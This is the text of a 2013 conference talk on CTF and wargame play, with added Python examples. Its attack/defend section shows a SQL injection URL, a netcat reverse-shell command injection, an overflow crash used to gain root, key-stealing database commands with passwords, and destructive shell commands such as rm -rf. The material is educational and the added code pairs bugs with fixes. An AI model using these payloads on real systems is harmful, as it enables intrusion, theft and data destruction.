Playing CTFs for Fun & Profit
Presented at BSides London 2013



1. Playing CTFs for Fun & Profit

2. Me
   - @impdefined
   - Software developer
   - Know a lot about bugs
   - Trying not to make things worse

3. Me
   - Playing CTFs for ~2 years
   - CTF team 0xbadf00d
   - Contributor to io.smashthestack.org

4. You

5. Wargames & CTFs

6. Wargames & CTFs – Why?
   - Learning
   - Hands-on experience
   - Legal
   - Fun! (and profit)

7. Wargames & CTFs – Why?

8–11. Wargames (build-up of slide 12)

12. Wargames
   - Technical security exercises
   - Hacking challenges
   - Progress through a series of levels
   - No time limits
   - Solo

13. Wargames - categories
   - Web
   - Binary exploitation
   - Cryptography
   - General design flaws

14. Wargames - examples

15. (John the Ripper output)
    Loaded 1 password hash (FreeBSD MD5 [32/32])
    *******          (administrator)
    guesses: 1  time: 0:00:00:18 100%  c/s: 13207  trying: ********

16. Wargames - experience

17. Playing wargames I got to:
   - Implement a padding oracle attack against RSA
   - Despair at the state of PHP
   - Implement a CPU timing attack
   - Exploit a kernel stack buffer overflow
   - Create a JS VM for a custom processor architecture
   - Write lots of custom shellcode
   - XOR all the things

18. Capture the Flag

19. Capture the Flag
   - Time-limited event to test your skills
   - Team-based
   - Competitive
   - Not "progressive"

20. CTF types
   - Challenge-based: DEF CON quals, Ghost In The Shellcode, CSAW CTF
   - Attack/defend: DEF CON finals, 44Con CTF 2012

21. CTF types
   - Lots of online events: ~20 last year, mainly challenge-based
   - Live events! 44CON: Lewt; RuCTFE: £3,000; Codegate: £11,000

22. Playing CTF

23–24. Capture the flag experience

25. CTF challenge - jacked

26. CTF challenge - jacked
    # nc jacked.final2012.ghostintheshellcode.com 2121
    Jacks Blackjack Simulator
    Blackjack pays 2:1
    Dealer must hit soft 17
    Single deck, shuffled after every round
    Enter your name: pwn
    Your table companions:
    Player 1 is Tracy with $1332
    Player 2 is Grace with $770
    Player 3 is Curtis with $1376
    Player 4 is Bryan with $1950
    You have $1000
    Place your bet (zero to exit): $

27. CTF challenge - jacked
   - $1,000,000,000 will win the game
   - Good random source
   - 32bit seed
    Player 1 is Tracy with $1332
    Player 2 is Grace with $770
    Player 3 is Curtis with $1376
    Player 4 is Bryan with $1950

28. CTF challenge - jacked
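What the companion bankrolls give away, as an added example (my code, not the talk's or the challenge's source): if the four bankrolls are the first outputs of a generator that was seeded with only 32 bits, an observer can recover the seed from them and then predict every later draw, which is the whole deck. The slides do not name the generator or the formula, so three things here are assumptions: the game uses glibc's rand(), it seeds with the current time at connect, and a bankroll is 500 + rand() % 1500. The time assumption is what keeps the search small enough for Python; a blind sweep of all 2^32 seeds would be written in C.

```python
from collections import deque


def glibc_rand(seed):
    """Yield what glibc's rand() returns after srand(seed).

    Re-implementation of the additive feedback generator in glibc's
    random_r.c, so a 32-bit seed can be searched for offline.
    """
    seed &= 0xFFFFFFFF
    if seed >= 0x80000000:          # glibc keeps the seed in an int32_t
        seed -= 0x100000000
    if seed == 0:                   # srand(0) behaves like srand(1)
        seed = 1
    r = [seed]
    for i in range(1, 31):          # Park-Miller LCG fills the 31-word table
        r.append((16807 * r[i - 1]) % 2147483647)
    for i in range(31, 34):
        r.append(r[i - 31])
    for i in range(34, 344):        # glibc discards the first 310 results
        r.append((r[i - 31] + r[i - 3]) & 0xFFFFFFFF)
    state = deque(r, maxlen=34)     # only the last 34 words matter from here
    while True:
        value = (state[-31] + state[-3]) & 0xFFFFFFFF
        state.append(value)
        yield value >> 1


def first_outputs(seed, n):
    rng = glibc_rand(seed)
    return [next(rng) for _ in range(n)]


def bankrolls(seed, players=4):
    """Assumed model: each companion starts with 500 + rand() % 1500."""
    return [500 + v % 1500 for v in first_outputs(seed, players)]


def recover_seed(observed, lo, hi):
    """Search seeds in [lo, hi) for one whose modelled bankrolls match."""
    for seed in range(lo, hi):
        if bankrolls(seed, len(observed)) == observed:
            return seed
    return None


def predict(seed, skip, n):
    """The n outputs the game will draw after the first `skip` are used up."""
    return first_outputs(seed, skip + n)[skip:]


if __name__ == "__main__":
    # Constructed scenario, not data from the event: the server called
    # srand(time(NULL)) when we connected, and our clock is a little later.
    true_seed = 1356998400                          # 2013-01-01 00:00:00 UTC
    observed = bankrolls(true_seed)                 # what the banner printed
    now = true_seed + 37
    found = recover_seed(observed, now - 600, now + 1)
    print("bankrolls", observed, "=> seed", found)
    print("next 5 rand() values:", predict(found, 4, 5))
```

The generator is checked against the well-known srand(1) sequence (1804289383, 846930886, ...) before it is trusted for the search; if the real game used a different PRNG or formula, only `glibc_rand` and `bankrolls` change, the recovery loop stays the same.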
29. CTF challenge - Folly
   - Text adventure
   - On winning, enter shellcode
   - Binary is chrooted, make custom code
   - Read "key" file... get another port and binary

30. CTF challenge - Folly
   - x86_64
   - x86
   - ARM
   - ARM Thumb
   - PPC
   - Alpha
   - CRIS

31–37. CTF challenge - blocky

38. 44CON CTF 2012

39. 44CON CTF 2012
   - Attack & Defend
   - Provided with: virtual machine, IP address, ranges of target machines

40. Attack & Defend
   - Kind of like a pentest, but more fun
   - I have a plan: Recon, Harden, Write exploits, Run riot, Get the girl

41. Recon
   - I'd rather be offline than owned
   - Self-recon
   - Capture traffic
   - Quick nmap of non-player servers

42–43. Recon - services

44. Recon - scoring
   - Packet captures shed some light
   - Regular "scoring rounds", every 30 minutes
   - Scoring server stores new keys in services and checks for previous keys

45–48. Pastie

49. Pastie
   - Written in PHP
   - Pastes stored in a MySQL database
   - PHP+MySQL
   - Can you tell what the vuln is yet?

50. Pastie vulnerability
   - Classic SQL injection

51. Pastie fix
   - It's not all pwnpwnpwn
   - Updated code with prepared statements
   - PHP

52. Pastie exploit
   - I want keys!

53. Pastie exploit
    https://ip/view/%+and+lang+=+text+order+by+date+desc+--+

54. Pastie exploit

55. Pastie exploit – scripted
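The Pastie bug and its fix side by side, as an added example (mine; the service's PHP and MySQL schema are on image slides and are not reproduced). The table, the query shape and the payload are constructed for the demo, using sqlite3 in place of MySQL: the payload makes the same moves as the URL on slide 53, a wildcard id, a filter on lang, a reorder by date so the newest paste (the scoring key) comes first, and a comment that swallows the rest of the query.

```python
import sqlite3

# Constructed rows: the third one is the newest paste, standing in for the
# key the scoring server dropped into the service this round.
PASTES = [
    ("a1b2", "hello world", "text", 1),
    ("c3d4", "print('hi')", "python", 2),
    ("e5f6", "KEY-constructed-0042", "text", 3),
]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pastie (id TEXT, pastie TEXT, lang TEXT, date INTEGER)")
    db.executemany("INSERT INTO pastie VALUES (?, ?, ?, ?)", PASTES)
    return db


def view_vulnerable(db, paste_id):
    """Query built by string concatenation, the mistake the slides describe."""
    sql = "SELECT pastie FROM pastie WHERE id LIKE '%s' LIMIT 1" % paste_id
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def view_fixed(db, paste_id):
    """Prepared statement: the id is bound as data and can never become SQL."""
    sql = "SELECT pastie FROM pastie WHERE id LIKE ? LIMIT 1"
    row = db.execute(sql, (paste_id,)).fetchone()
    return row[0] if row else None


# Decoded form of the slide's URL payload, adapted to the constructed schema.
PAYLOAD = "%' AND lang = 'text' ORDER BY date DESC -- "

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", view_vulnerable(db, PAYLOAD))   # newest paste: the key
    print("fixed:     ", view_fixed(db, PAYLOAD))        # no paste has that id
```

Against the vulnerable view the payload turns `WHERE id LIKE '…' LIMIT 1` into `WHERE id LIKE '%' AND lang = 'text' ORDER BY date DESC`, so the first row back is whatever was pasted last; against the parameterised view the same string is just a LIKE pattern that matches nothing.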
56. Mailserver

57. Mailserver
   - SMTP and POP3 server
   - Keys stored in emails
   - Written in Ruby
   - I don't know Ruby
   - Only ~500 lines

58. Mailserver - vulnerability
   - This just interprets provided text as Ruby code
   - Time to learn Ruby!
   - ???

59. Mailserver - vulnerability
   - Looking at the logs...
   - Verify vulnerability

60. Mailserver - exploitation
   - I'm sure Ruby is lovely...
   - ... but let's just find some code to copy

61–62. Mailserver - exploitation

63. Mailserver - scripted

64. Auth

65. Auth
   - Listening on port 23500

66. Auth

67. Auth
   - Redis wrapper
   - Stores arbitrary strings

68. Auth vulnerability
   - Source analysis 101

69. Auth vulnerability

70–71. Auth exploitation
   - Classic stack buffer overflow
   - Overwrite return address with any value
   - Pre-auth remote code execution...
   - ... noooope.

72. Auth exploitation

73. Auth exploitation
   - Put a valid writable address in the pointer
   - Easy if this was a 32bit process
   - 64bit, annoying memory space

74. Auth exploitation
    gdb$ info proc map
    Mapped address spaces:
    Start Addr          End Addr            Size     Offset   objfile
    0x400000            0x403000            0x3000   0x0      /services/auth/auth
    0x602000            0x603000            0x1000   0x2000   /services/auth/auth
    0x603000            0x604000            0x1000   0x3000   /services/auth/auth
    0x604000            0x625000            0x21000  0x0      [heap]
    ........            ........            .......  ...      ......
    0x7ffffffde000      0x7ffffffff000      0x21000  0x0      [stack]
    0xffffffffff600000  0xffffffffff601000  0x1000   0x0      [vsyscall]

75. Auth exploitation (same map, addresses zero-padded to 64 bits)
    gdb$ info proc map
    Mapped address spaces:
    Start Addr          End Addr            Size     Offset   objfile
    0x0000000000400000  0x0000000000403000  0x3000   0x0      /services/auth/auth
    0x0000000000602000  0x0000000000603000  0x1000   0x2000   /services/auth/auth
    0x0000000000603000  0x0000000000604000  0x1000   0x3000   /services/auth/auth
    0x0000000000604000  0x0000000000625000  0x21000  0x0      [heap]
    ........            ........            .......  ...      ......
    0x00007ffffffde000  0x00007ffffffff000  0x21000  0x0      [stack]
    0xffffffffff600000  0xffffffffff601000  0x1000   0x0      [vsyscall] (readonly)

76. Auth exploitation
   - Time's up!
   - No remote code execution
   - Very limited DoS: crash process, restarts automatically
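Why the 64-bit map is "annoying", as an added example (my code and my reading of slides 73 to 75, not the speaker's analysis). The map shows no ASLR: the binary sits at 0x400000 and the stack at a fixed 0x7ffffffde000. What the zero-padded repeat of the map draws attention to is that every user-space address carries NUL bytes in its high positions, and a C-string copy (strcpy, sprintf, scanf %s) can write a run of non-NUL bytes plus exactly one terminator and nothing after it. A 32-bit .data address such as 0x0804a010 has no NUL byte at all; its 64-bit counterpart 0x0000000000602010 has five. The slides do not say which copy function overflows the buffer; if it is a length-based read, NUL bytes are not the obstacle and this analysis does not apply. The map text is the slide's own, with the elided rows left out.

```python
import re
import struct

# The rows from slide 75 (the "........" placeholder line omitted).
PROC_MAP = """\
0x0000000000400000 0x0000000000403000 0x3000 0x0 /services/auth/auth
0x0000000000602000 0x0000000000603000 0x1000 0x2000 /services/auth/auth
0x0000000000603000 0x0000000000604000 0x1000 0x3000 /services/auth/auth
0x0000000000604000 0x0000000000625000 0x21000 0x0 [heap]
0x00007ffffffde000 0x00007ffffffff000 0x21000 0x0 [stack]
0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall]
"""

MAP_LINE = re.compile(
    r"^(0x[0-9a-f]+)\s+(0x[0-9a-f]+)\s+0x[0-9a-f]+\s+0x[0-9a-f]+\s+(\S.*)$")


def parse_map(text):
    """gdb 'info proc map' rows -> list of (start, end, objfile)."""
    regions = []
    for line in text.splitlines():
        m = MAP_LINE.match(line.strip())
        if m:
            regions.append((int(m.group(1), 16), int(m.group(2), 16), m.group(3)))
    return regions


def classify(addr, bits):
    """Little-endian bytes of addr and whether a C-string copy can deliver them.

    Such a copy writes non-NUL bytes followed by one terminating NUL; any
    further zero bytes have to be in memory already (only true when the
    pointer is the last field the overflow reaches and its old value had
    zero high bytes too).
    """
    raw = struct.pack("<Q" if bits == 64 else "<I", addr)
    body = raw.rstrip(b"\0")
    trailing = len(raw) - len(body)
    if b"\0" in body:
        usable, note = False, "interior NUL: the copy stops before the address is complete"
    elif trailing <= 1:
        usable, note = True, "clean: fully deliverable"
    else:
        usable, note = True, f"needs {trailing - 1} already-zero high byte(s) beyond the terminator"
    return {"hex": raw.hex(" "), "nuls": raw.count(0), "usable": usable, "note": note}


def survey(text, bits=64, offset=0x10):
    """Classify an address a few bytes into each region, so the page-aligned
    0x00 low byte of the region start does not dominate the picture."""
    return [(name, hex(start + offset), classify(start + offset, bits))
            for start, _end, name in parse_map(text)]


if __name__ == "__main__":
    for name, addr, info in survey(PROC_MAP):
        print(f"{addr:>20} {name:<22} {info['hex']}  {info['note']}")
    print("32-bit comparison, 0x0804a010:", classify(0x0804a010, 32)["note"])
```

Run it and the writable rows the slide asks about (0x602xxx, 0x603xxx, the heap) all come out as "needs 4 already-zero high bytes": usable as a return address that was already 0x00000000004xxxxx, not as an arbitrary pointer written somewhere in the middle of the overflow.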
77–80. Servicemon

81. Servicemon
   - Command injection via "filelist" parameter

82. Servicemon - vulnerability
    filelist=/services/auth/auth      %x(shasum /services/auth/auth)
    filelist=notafile || id           %x(shasum notafile || id)

83. Servicemon - vulnerability

84. Servicemon - exploitation
   - Never mind keys, I want a shell
    contestant@ubuntu:~$ nc -l 31337 -e /bin/sh
    nc: invalid option -- e

85. Servicemon - exploitation
   - Stand back... I know bash*
    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.75 31337 >/tmp/f
    http://ip:3000/hash?filelist=notafile||rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202>%261%7Cnc%20192.168.1.75%2031337%20>%2Ftmp%2Ff
   * totally copied from somewhere

86. Servicemon - exploitation
    contestant@ubuntu:~$ nc -lv 31337
    Connection from 192.168.1.72 port 31337 [tcp/*] accepted
    $ whoami
    contestant
    $ pwd
    /services/servicemon
   - I got a shell!
   - Now I can have some fun!
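The servicemon bug class and a structural fix, as an added example (mine, not the service's Ruby). Slide 82 shows the parameter being pasted straight into a `%x(shasum …)` shell command, which is why `notafile || id` runs `id`; the Python stand-in below does the same with `subprocess.run(..., shell=True)` (assuming `sha1sum` is on PATH where the slide used `shasum`). The fixed version is my choice of remedy rather than the one the slides discuss: it never starts a shell, hashes the file in-process, and pins the name inside a directory so the parameter cannot name `/etc/passwd` either. The sample file is constructed.

```python
import hashlib
import os
import subprocess
import tempfile


def hash_vulnerable(filelist):
    """Interpolate the parameter into a shell command line, the Python
    equivalent of the Ruby %x(shasum #{filelist}) on slide 82."""
    proc = subprocess.run("sha1sum " + filelist, shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def hash_fixed(filelist, allowed_root):
    """No shell at all: confine the name to allowed_root and hash in-process."""
    root = os.path.realpath(allowed_root)
    path = os.path.realpath(os.path.join(root, filelist))
    if os.path.commonpath([root, path]) != root:
        return None                     # absolute path or ../ escape: refuse
    try:
        with open(path, "rb") as f:
            return hashlib.sha1(f.read()).hexdigest()
    except OSError:
        return None                     # "notafile || id" is now just a missing file


def write_sample():
    """Constructed stand-in for /services/auth/auth; returns (root, name)."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "auth"), "wb") as f:
        f.write(b"constructed sample binary\n")
    return root, "auth"


PAYLOAD = "notafile || id"   # the slide's probe: || runs id when sha1sum fails

if __name__ == "__main__":
    print("vulnerable:", hash_vulnerable(PAYLOAD).strip())
    root, name = write_sample()
    print("fixed, legit file:", hash_fixed(name, root))
    print("fixed, payload:   ", hash_fixed(PAYLOAD, root))
```

The reverse shell on slide 85 is only a longer string in the same parameter; anything that keeps `shell=True` (or `%x`) with untrusted input in the command line stays exploitable no matter how the metacharacters are filtered, which is why the fix removes the shell rather than escaping for it.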
87–88. Rampage

89. Steal all the keys
    mysql --user=sinatra --password=44ConCTF servicemon -e "select status from statuses order by created_at desc limit 1;"
    mysql --user=pastie --password=J@cobsClub$ paste -e "select pastie from pastie order by date desc limit 1;"
    OUTPUT=$(redis-cli -r 1 keys * | tail -n 1)
    redis-cli -r 1 lrange $OUTPUT 0 1

90. Leave a calling card
    echo Look behind you! A three-headed monkey! >/services/pastie/.win

91. Annoy
    echo exit >> ~/.bashrc
    rm -rf /services
    echo export PROMPT_COMMAND="cd" >> ~/.bashrc

92. Escalation

93. Escalation
   - Getting keys is fine
   - Getting shells is better
   - Getting root is best

94. Escalation – the hard way
    $ find /etc -writable
    /etc/init/mail.conf
    /etc/init/auth.conf

95. Escalation – the hard way
    USER  PID   TTY  STAT  COMMAND
    root  8680  ?    Ss    /services/auth/auth

96. Escalation – the hard way
   - When auth starts we will get a root shell
   - Lame DoS to the rescue!
    perl -e 'print "auth " . "A"x1100 . "\n"' | nc ip 23500
    Connection from 192.168.1.73 port 31337 [tcp/*] accepted
    # whoami
    root

97. Escalation – the easy way
    220 Mail Service ready (33147)
    HELO
    250 Requested mail action okay, completed
    EXPN respond(client, %x(whoami))
    root

98. Playing wargames & CTFs

99. Useful stuff – general
   - Scripting language
   - Hex editor
   - Linux & Windows VMs
   - The Linux "file" command

100. Useful stuff - web
   - Firefox + Firebug + Tamper Data
   - php.net

101. Useful stuff - binary
   - C
   - Disassembler (IDA demo, Hopper)

102. Useful stuff - CTF
   - Collaboration! Hall.com, sync.in, Wiki, IRC

103. Wargame recommendations
    overthewire.org (Natas)     Web exploitation
    io.smashthestack.org        Binary exploitation
    hackthissite.org            Web exploitation
    overthewire.org (Vortex)    Binary exploitation
    overthewire.org (Bandit)    "Absolute beginners" (learn how to Linux)

104. CTF recommendations
   - http://ctftime.org
   - DEF CON CTF: June, binary-heavy
   - CSAW CTF: "gentle" introduction, September

105. Motivation
   - 44CON: Lewt
   - CSAW: £600
   - HitB AMS: £1,500
   - Plaid: £2,500
   - RuCTFE: £3,000
   - PHdays: £6,000
   - Codegate: £11,000

106. Motivation

107. Questions
   - @impdefined
   - impdefined@0xbadf00d.co.uk
